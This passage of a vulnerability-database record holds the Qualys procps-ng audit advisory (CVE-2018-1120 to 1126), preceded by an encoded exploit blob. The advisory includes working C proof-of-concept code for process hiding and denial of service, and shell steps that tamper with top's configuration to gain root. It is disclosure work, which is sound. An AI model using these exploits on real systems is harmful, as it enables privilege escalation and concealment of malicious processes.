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", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/44806/"}], "packetstorm": [{"lastseen": "2018-05-24T01:24:11", "description": "", "published": "2018-05-22T00:00:00", "type": "packetstorm", "title": "Procps-ng Audit Report", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-1126", "CVE-2018-1121", "CVE-2018-1124", "CVE-2018-1120", "CVE-2018-1123", "CVE-2018-1122", "CVE-2018-1125"], "modified": "2018-05-22T00:00:00", "id": "PACKETSTORM:147806", "href": "https://packetstormsecurity.com/files/147806/Procps-ng-Audit-Report.html", "sourceData": "` \nQualys Security Advisory \n \nProcps-ng Audit Report \n \n \n======================================================================== \nContents \n======================================================================== \n \nSummary \n1. FUSE-backed /proc/PID/cmdline \n2. Unprivileged process hiding \n3. Local Privilege Escalation in top (Low Impact) \n4. Denial of Service in ps \n5. Local Privilege Escalation in libprocps (High Impact) \n5.1. Vulnerability \n5.2. Exploitation \n5.3. Exploitation details \n5.4. Non-PIE exploitation \n5.5. PIE exploitation \nAcknowledgments \n \n \n======================================================================== \nSummary \n======================================================================== \n \nWe performed a complete audit of procps-ng, the \"command line and full \nscreen utilities for browsing procfs, a 'pseudo' file system dynamically \ngenerated by the [Linux] kernel to provide information about the status \nof entries in its process table\" (https://gitlab.com/procps-ng/procps). \nprocps-ng contains the utilities free, kill, pgrep, pidof, pkill, pmap, \nps, pwdx, skill, slabtop, snice, sysctl, tload, top, uptime, vmstat, w, \nwatch, and the necessary libprocps library. \n \nWe discovered and submitted patches for more than a hundred bugs and \nvulnerabilities in procps-ng; for reference, our patches are available \nat: \n \nhttps://www.qualys.com/2018/05/17/procps-ng-audit-report-patches.tar.gz \n \nIn the remainder of this advisory, we present our most interesting \nfindings: \n \n1. FUSE-backed /proc/PID/cmdline (CVE-2018-1120) \n \nAn attacker can block any read() access to /proc/PID/cmdline by \nmmap()ing a FUSE file (Filesystem in Userspace) onto this process's \ncommand-line arguments. The attacker can therefore block pgrep, pidof, \npkill, ps, and w, either forever (a denial of service), or for some \ncontrolled time (a synchronization tool for exploiting other \nvulnerabilities). \n \n2. Unprivileged process hiding (CVE-2018-1121) \n \nAn unprivileged attacker can hide a process from procps-ng's \nutilities, by exploiting either a denial of service (a rather noisy \nmethod) or a race condition inherent in reading /proc/PID entries (a \nstealthier method). \n \n3. Local Privilege Escalation in top (CVE-2018-1122) \n \ntop reads its configuration file from the current working directory, \nwithout any security check, if the HOME environment variable is unset \nor empty. In this very unlikely scenario, an attacker can carry out an \nLPE (Local Privilege Escalation) if an administrator executes top in \n/tmp (for example), by exploiting one of several vulnerabilities in \ntop's config_file() function. \n \n4. Denial of Service in ps (CVE-2018-1123) \n \nAn attacker can overflow the output buffer of ps, when executed by \nanother user, administrator, or script: a denial of service only (not \nan LPE), because ps mmap()s its output buffer and mprotect()s its last \npage with PROT_NONE (an effective guard page). \n \n5. Local Privilege Escalation in libprocps (CVE-2018-1124) \n \nAn attacker can exploit an integer overflow in libprocps's \nfile2strvec() function and carry out an LPE when another user, \nadministrator, or script executes a vulnerable utility (pgrep, pidof, \npkill, and w are vulnerable by default; other utilities are vulnerable \nif executed with non-default options). Moreover, an attacker's process \nrunning inside a container can trigger this vulnerability in a utility \nrunning outside the container: the attacker can exploit this userland \nvulnerability and break out of the container or chroot. We will \npublish our proof-of-concept exploits in the near future. \n \nAdditionally, CVE-2018-1125 has been assigned to \n0008-pgrep-Prevent-a-potential-stack-based-buffer-overflo.patch, and \nCVE-2018-1126 to 0035-proc-alloc.-Use-size_t-not-unsigned-int.patch. \n \n \n======================================================================== \n1. FUSE-backed /proc/PID/cmdline (CVE-2018-1120) \n======================================================================== \n \nIn this experiment, we add a sleep(60) to hello_read() in \nhttps://github.com/libfuse/libfuse/blob/master/example/hello.c and \ncompile it, mount it on /tmp/fuse, and mmap() /tmp/fuse/hello onto the \ncommand-line arguments of a simple proof-of-concept: \n \n$ gcc -Wall hello.c `pkg-config fuse --cflags --libs` -o hello \n$ mkdir /tmp/fuse \n$ ./hello /tmp/fuse \n \n$ cat > fuse-backed-cmdline.c << \"EOF\" \n#include <fcntl.h> \n#include <stdio.h> \n#include <stdlib.h> \n#include <string.h> \n#include <sys/mman.h> \n#include <sys/stat.h> \n#include <sys/types.h> \n#include <unistd.h> \n \n#define die() do { \\ \nfprintf(stderr, \"died in %s: %u\\n\", __func__, __LINE__); \\ \nexit(EXIT_FAILURE); \\ \n} while (0) \n \n#define PAGESZ ((size_t)4096) \n \nint \nmain(const int argc, const char * const argv[]) \n{ \nif (argc <= 0) die(); \nconst char * const arg_start = argv[0]; \nconst char * const last_arg = argv[argc-1]; \nconst char * const arg_end = last_arg + strlen(last_arg) + 1; \n \nif (arg_end <= arg_start) die(); \nconst size_t len = arg_end - arg_start; \nif (len < 2 * PAGESZ) die(); \n \nchar * const addr = (char *)(((size_t)arg_start + PAGESZ-1) & ~(PAGESZ-1)); \nif (addr < arg_start) die(); \nif (addr + PAGESZ > arg_end) die(); \n \nconst int fd = open(\"/tmp/fuse/hello\", O_RDONLY); \nif (fd <= -1) die(); \nif (mmap(addr, PAGESZ, PROT_READ, MAP_PRIVATE | MAP_FIXED, fd, 0) != addr) die(); \nif (close(fd)) die(); \n \nfor (;;) { \nsleep(1); \n} \ndie(); \n} \nEOF \n$ gcc -Wall fuse-backed-cmdline.c -o fuse-backed-cmdline \n$ ./fuse-backed-cmdline `perl -e 'print \"A\" x 8192'` \n \nThen, if root executes ps (for example): \n \n# time ps ax \nPID TTY STAT TIME COMMAND \n... \nreal 1m0.021s \nuser 0m0.003s \nsys 0m0.017s \n \n \n======================================================================== \n2. Unprivileged process hiding (CVE-2018-1121) \n======================================================================== \n \nSeveral procps-ng utilities (pgrep, pidof, pkill, ps, w) read the \n/proc/PID/cmdline of every process running on the system; hence, an \nunprivileged attacker can hide a process (albeit noisily) by exploiting \na denial of service in procps-ng (for example, the FUSE-backed denial of \nservice, or one of the integer overflows in file2strvec()). \n \nAlternatively, we devised a stealthier method for hiding a process: \n \n1/ fork() our process until it occupies the last PID \n(/proc/sys/kernel/pid_max - 1) or one of the last PIDs; \n \n2/ monitor (with inotify) the /proc directory and the /proc/PID/stat \nfile of one of the very first PIDs, for IN_OPEN events (opendir() and \nopen()); \n \n3/ when these events occur (when a procps-ng utility starts scanning \n/proc for /proc/PID entries), fork() our process until its PID wraps \naround and occupies one of the very first PIDs; \n \n4/ monitor (with inotify) the /proc directory for an IN_CLOSE_NOWRITE \nevent (closedir()); \n \n5/ when this event occurs (when the procps-ng utility stops scanning \n/proc), go back to 1/. \n \nThis simple method works, because the kernel's proc_pid_readdir() \nfunction returns the /proc/PID entries in ascending numerical order. \nMoreover, this race condition can be made deterministic by using a \nFUSE-backed /proc/PID/cmdline as a synchronization tool. \n \n$ cat > unprivileged-process-hiding.c << \"EOF\" \n#include <errno.h> \n#include <limits.h> \n#include <signal.h> \n#include <stdio.h> \n#include <stdlib.h> \n#include <sys/inotify.h> \n#include <sys/stat.h> \n#include <sys/types.h> \n#include <sys/wait.h> \n#include <unistd.h> \n \n#define die() do { \\ \nfprintf(stderr, \"died in %s: %u\\n\", __func__, __LINE__); \\ \nexit(EXIT_FAILURE); \\ \n} while (0) \n \nint \nmain(void) \n{ \nfor (;;) { \nchar lost[64]; \n{ \nconst pid_t hi = getpid(); \npid_t lo = fork(); \nif (lo <= -1) die(); \nif (!lo) { /* child */ \nlo = getpid(); \nif (lo < hi) exit(EXIT_SUCCESS); /* parent continues */ \nfor (;;) { \nif (kill(hi, 0) != -1) continue; \nif (errno != ESRCH) die(); \nbreak; \n} \ncontinue; \n} \n/* parent */ \nif (lo > hi) exit(EXIT_FAILURE); /* child continues */ \nint status = 0; \nif (waitpid(lo, &status, 0) != lo) die(); \nif (!WIFEXITED(status)) die(); \nif (WEXITSTATUS(status) != EXIT_SUCCESS) die(); \n \nprintf(\"%d -> %d -> \", hi, lo); \nfor (;;) { \nstruct stat st; \nif (--lo <= 0) die(); \nsnprintf(lost, sizeof(lost), \"/proc/%d/stat\", lo); \nif (stat(lost, &st) == 0) break; \n} \nprintf(\"%d\\n\", lo); \n} \n \nconst int pofd = inotify_init(); \nif (pofd <= -1) die(); \nif (inotify_add_watch(pofd, \"/proc\", IN_OPEN) <= -1) die(); \n \nconst int lofd = inotify_init(); \nif (lofd <= -1) die(); \nif (inotify_add_watch(lofd, lost, IN_OPEN) <= -1) die(); \n \nconst int pcfd = inotify_init(); \nif (pcfd <= -1) die(); \nif (inotify_add_watch(pcfd, \"/proc\", IN_CLOSE_NOWRITE) <= -1) die(); \n \nchar buf[sizeof(struct inotify_event) + NAME_MAX + 1]; \nconst struct inotify_event * const evp = (void *)buf; \n \nfor (;;) { \nif (read(pofd, buf, sizeof(buf)) < (ssize_t)sizeof(*evp)) die(); \nif (evp->mask & IN_ISDIR) break; \n} \n \nif (read(lofd, buf, sizeof(buf)) < (ssize_t)sizeof(*evp)) die(); \nfor (;;) { \nconst pid_t hi = getpid(); \npid_t lo = fork(); \nif (lo <= -1) die(); \nif (lo) exit(EXIT_SUCCESS); /* parent */ \n/* child */ \nlo = getpid(); \nif (lo < hi) { \nprintf(\"%d -> %d\\n\", hi, lo); \nbreak; \n} \n} \n \nfor (;;) { \nif (read(pcfd, buf, sizeof(buf)) < (ssize_t)sizeof(*evp)) die(); \nif (evp->mask & IN_ISDIR) break; \n} \n \nif (close(pofd)) die(); \nif (close(lofd)) die(); \nif (close(pcfd)) die(); \n} \ndie(); \n} \nEOF \n$ gcc -Wall unprivileged-process-hiding.c -o unprivileged-process-hiding \n$ ./unprivileged-process-hiding \n \nThen, if root executes ps (for example): \n \n# ps ax | grep '[u]nprivileged-process-hiding' | wc \n0 0 0 \n \n \n======================================================================== \n3. Local Privilege Escalation in top (CVE-2018-1122) \n======================================================================== \n \nIf a/ an administrator executes top in a directory writable by an \nattacker and b/ the HOME environment variable is unset or empty, then \ntop reads its configuration file from the current working directory, \nwithout any security check: \n \n3829 static void configs_read (void) { \n.... \n3847 p_home = getenv(\"HOME\"); \n3848 if (!p_home || p_home[0] == '\\0') \n3849 p_home = \".\"; \n3850 snprintf(Rc_name, sizeof(Rc_name), \"%s/.%src\", p_home, Myname); \n3851 \n3852 if (!(fp = fopen(Rc_name, \"r\"))) { \n.... \n3865 if (fp) { \n3866 p = config_file(fp, Rc_name, &tmp_delay); \n \nAlthough b/ is very unlikely, we developed a simple command-line method \nfor exploiting one of the vulnerabilities in config_file(), when top is \nnot a PIE (Position-Independent Executable). For example, on Ubuntu \n16.04.4: \n \n$ file /usr/bin/top \n/usr/bin/top: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=e64fe2c89ff07ca4ce5d169078586d2854628a29, stripped \n \nFirst, we dump a clean configuration file to /tmp/.toprc, by running top \nand pressing the 'W' key: \n \n$ cd /tmp \n$ env -u HOME top \nW \nq \n \nSecond, we add an arbitrary \"inspect\" command to this configuration file \n(inspect commands are normally executed when the user presses the 'Y' \nkey): \n \n$ echo -e 'pipe\\tname\\tid>>/tmp/top.%d.%lx' >> .toprc \n \nTo execute our inspect command without user interaction, we will emulate \nthe 'Y' key by jumping directly into inspection_utility(), at 0x40a989 \n(the fflush(stdout) is INSP_BUSY's last instruction): \n \n3442 static void inspection_utility (int pid) { \n.... \n3496 case kbd_ENTER: \n3497 INSP_BUSY; \n3498 Insp_sel = &Inspect.tab[sel]; \n3499 Inspect.tab[sel].func(Inspect.tab[sel].fmts, pid); \n \n40a97d: 48 8b 3d 1c f8 20 00 mov 0x20f81c(%rip),%rdi # 61a1a0 <stdout> \n40a984: e8 67 7f ff ff callq 4028f0 <fflush@plt> \n40a989: 48 63 05 2c f9 20 00 movslq 0x20f92c(%rip),%rax # 61a2bc \n40a990: 8b 74 24 74 mov 0x74(%rsp),%esi \n40a994: 48 c1 e0 06 shl $0x6,%rax \n40a998: 48 03 05 61 11 23 00 add 0x231161(%rip),%rax # 63bb00 \n40a99f: 48 89 05 12 11 23 00 mov %rax,0x231112(%rip) # 63bab8 \n40a9a6: 48 8b 78 18 mov 0x18(%rax),%rdi \n40a9aa: ff 10 callq *(%rax) \n40a9ac: 5b pop %rbx \n \nTo jump directly into inspection_utility(), we will take control of \ntop's execution flow, by exploiting a vulnerability in config_file(). \n\"sortindx\" is read from the configuration file without any sanity check, \nand is later used by window_show() to access a struct FLD_t which \ncontains a function pointer \"sort\": \n \n5876 static int window_show (WIN_t *q, int wmax) { \n.... \n5894 qsort(q->ppt, Frame_maxtask, sizeof(proc_t*), Fieldstab[q->rc.sortindx].sort); \n \n40de01: ba 08 00 00 00 mov $0x8,%edx \n40de06: 48 c1 e0 05 shl $0x5,%rax \n40de0a: 48 8b 88 30 99 61 00 mov 0x619930(%rax),%rcx \n40de11: e8 7a 47 ff ff callq 402590 <qsort@plt> \n \nTo take control of this function pointer, we will write 0x40a989's LSW \n(Least Significant Word, 32 bits) into \"graph_mems\" and 0x40a989's MSW \n(Most Significant Word, 32 bits) into \"summclr\", which are read from the \nconfiguration file and written to 0x63ed30 (and 0x63ed34), a memory \nlocation accessible by 0x619930+(sortindx<<0x5): \n \n3676 static const char *config_file (FILE *fp, const char *name, float *delay) { \n.... \n3710 if (3 > fscanf(fp, \"\\twinflags=%d, sortindx=%d, maxtasks=%d, graph_cpus=%d, graph_mems=%d\\n\" \n3711 , &w->rc.winflags, &w->rc.sortindx, &w->rc.maxtasks, &w->rc.graph_cpus, &w->rc.graph_mems)) \n3712 return p; \n3713 if (4 != fscanf(fp, \"\\tsummclr=%d, msgsclr=%d, headclr=%d, taskclr=%d\\n\" \n3714 , &w->rc.summclr, &w->rc.msgsclr \n3715 , &w->rc.headclr, &w->rc.taskclr)) \n3716 return p; \n \n406f90: 4d 8d b5 30 ed 63 00 lea 0x63ed30(%r13),%r14 \n....... \n406fa9: 41 56 push %r14 \n....... \n406fb3: e8 d8 b7 ff ff callq 402790 <fscanf@plt> \n....... \n406fca: 49 8d 95 34 ed 63 00 lea 0x63ed34(%r13),%rdx \n....... \n406fe5: e8 a6 b7 ff ff callq 402790 <fscanf@plt> \n \nNext, we modify the configuration file's \"graph_mems\", \"summclr\", and \n\"sortindx\" accordingly: \n \n$ sed -i s/'graph_mems=[0-9]*'/graph_mems=$((0x40a989))/ .toprc \n \n$ sed -i s/'summclr=[0-9]*'/summclr=0/ .toprc \n \n$ sed -i s/'sortindx=[0-9]*'/sortindx=$(((0x63ed30-0x619930)>>0x5))/ .toprc \n \nLast, we turn off the View_MEMORY bit in the configuration file's \n\"winflags\", to prevent summary_show() from crashing because of our \nout-of-bounds \"graph_mems\": \n \n314 #define View_MEMORY 0x001000 // 'm' - display memory summary \n \n5418 static void summary_show (void) { \n.... \n5499 if (isROOM(View_MEMORY, 2)) { \n.... \n5540 if (w->rc.graph_mems) { \n.... \n5559 ix = w->rc.graph_mems - 1; \n.... \n5572 snprintf(util, sizeof(util), gtab[ix].swap, (int)((pct_swap * Graph_adj) + .5), gtab[ix].type); \n \n$ winflags=`grep -m 1 winflags= .toprc | sed s/'.*winflags=\\([0-9]*\\).*'/'\\1'/` \n$ sed -i s/'winflags=[0-9]*'/winflags=$((winflags&~0x001000))/ .toprc \n \nThen, if an administrator executes top in /tmp, without a HOME \nenvironment variable (or with an empty HOME environment variable): \n \n# cat /tmp/top.* \ncat: '/tmp/top.*': No such file or directory \n \n# cd /tmp \n# env -u HOME top \n... \nsignal 11 (SEGV) was caught by top, please \nsee http://www.debian.org/Bugs/Reporting \nSegmentation fault (core dumped) \n \n# cat /tmp/top.* \nuid=0(root) gid=0(root) groups=0(root) \n \n \n======================================================================== \n4. Denial of Service in ps (CVE-2018-1123) \n======================================================================== \n \nps's functions pr_args(), pr_comm(), and pr_fname() are vulnerable to an \nmmap-based buffer overflow of outbuf (ps's output buffer): \n \n401 static int pr_args(char *restrict const outbuf, const proc_t *restrict const pp){ \n402 char *endp = outbuf; \n403 int rightward = max_rightward; \n404 int fh = forest_helper(outbuf); \n405 \n406 endp += fh; \n407 rightward -= fh; \n408 \n409 if(pp->cmdline && !bsd_c_option) \n410 endp += escaped_copy(endp, *pp->cmdline, OUTBUF_SIZE, &rightward); \n411 else \n412 endp += escape_command(endp, pp, OUTBUF_SIZE, &rightward, ESC_DEFUNCT); \n413 \n414 if(bsd_e_option && rightward>1) { \n415 if(pp->environ && *pp->environ) { \n416 *endp++ = ' '; \n417 rightward--; \n418 endp += escape_strlist(endp, pp->environ, OUTBUF_SIZE, &rightward); \n419 } \n420 } \n421 return max_rightward-rightward; \n422 } \n \nThe number of bytes written to endp by the escape*() functions is added \nto endp (a pointer into outbuf), but never subtracted from OUTBUF_SIZE. \nNormally \"rightward\" prevents this buffer overflow, because the maximum \nnumber of \"cells\" written to outbuf is OUTBUF_SIZE, and is equal to the \nnumber of \"bytes\" written to outbuf; but not in escape_str_utf8(): \n \n36 static int escape_str_utf8(char *restrict dst, const char *restrict src, int bufsize, int *maxcells){ \n.. \n50 if (!(len = mbrtowc (&wc, src, MB_CUR_MAX, &s))) \n.. \n78 int wlen = wcwidth(wc); \n.. \n100 memcpy(dst, src, len); \n101 my_cells += wlen; \n102 dst += len; \n103 my_bytes += len; \n104 src += len; \n \nFor example, in the \"en_US.UTF-8\" locale, the multibyte sequence \n\"\\xf4\\x81\\x8e\\xb6\" consumes 4 bytes, but only 1 cell, and an easy \ntrigger for one of the outbuf overflows is: \n \n$ (A=`python -c 'print \"\\xf4\\x81\\x8e\\xb6\" * 32767'` exec -a `python -c 'print \"A\" * 65535'` sleep 60) & \n[1] 2670 \n \n# env LANG=en_US.UTF-8 ps awwe \nPID TTY STAT TIME COMMAND \n... \nSignal 11 (SEGV) caught by ps (procps-ng version 3.3.10). \n2670 pts/0 S 0:00ps:display.c:66: please report this bug \nSegmentation fault \n \nThis buffer overflow is a denial of service only (not an LPE), because \nps mmap()s outbuf and mprotect()s its last page with PROT_NONE (an \neffective guard page): \n \n2147 void init_output(void){ \n.... \n2164 outbuf = mmap( \n2165 0, \n2166 page_size * (outbuf_pages+1), // 1 more, for guard page at high addresses \n2167 PROT_READ | PROT_WRITE, \n2168 MAP_PRIVATE | MAP_ANONYMOUS, \n2169 -1, \n2170 0 \n2171 ); \n.... \n2174 mprotect(outbuf + page_size*outbuf_pages, page_size, PROT_NONE); // guard page \n \n \n======================================================================== \n5. Local Privilege Escalation in libprocps (CVE-2018-1124) \n======================================================================== \n \n======================================================================== \n5.1. Vulnerability \n======================================================================== \n \nlibprocps's file2strvec() function parses a process's /proc/PID/cmdline \n(or /proc/PID/environ), and creates an in-memory copy of this process's \nargv[] (command-line argument strings, and pointers to these strings). \nfile2strvec() is called when either PROC_FILLCOM or PROC_FILLARG, but \nnot PROC_EDITCMDLCVT, is passed to openproc() or readproctab() (or \nPROC_FILLENV but not PROC_EDITENVRCVT). \n \nfile2strvec() is vulnerable to three integer overflows (of \"tot\", \"c\", \nand \"tot + c + align\"): \n \n660 static char** file2strvec(const char* directory, const char* what) { \n661 char buf[2048]; /* read buf bytes at a time */ \n662 char *p, *rbuf = 0, *endbuf, **q, **ret; \n663 int fd, tot = 0, n, c, end_of_file = 0; \n664 int align; \n... \n670 /* read whole file into a memory buffer, allocating as we go */ \n671 while ((n = read(fd, buf, sizeof buf - 1)) >= 0) { \n... \n686 rbuf = xrealloc(rbuf, tot + n); /* allocate more memory */ \n687 memcpy(rbuf + tot, buf, n); /* copy buffer into it */ \n688 tot += n; /* increment total byte ctr */ \n... \n697 endbuf = rbuf + tot; /* count space for pointers */ \n698 align = (sizeof(char*)-1) - ((tot + sizeof(char*)-1) & (sizeof(char*)-1)); \n699 for (c = 0, p = rbuf; p < endbuf; p++) { \n700 if (!*p || *p == '\\n') \n701 c += sizeof(char*); \n... \n705 c += sizeof(char*); /* one extra for NULL term */ \n706 \n707 rbuf = xrealloc(rbuf, tot + c + align); /* make room for ptrs AT END */ \n \nTo the best of our knowledge, the integer overflows of \"c\" and 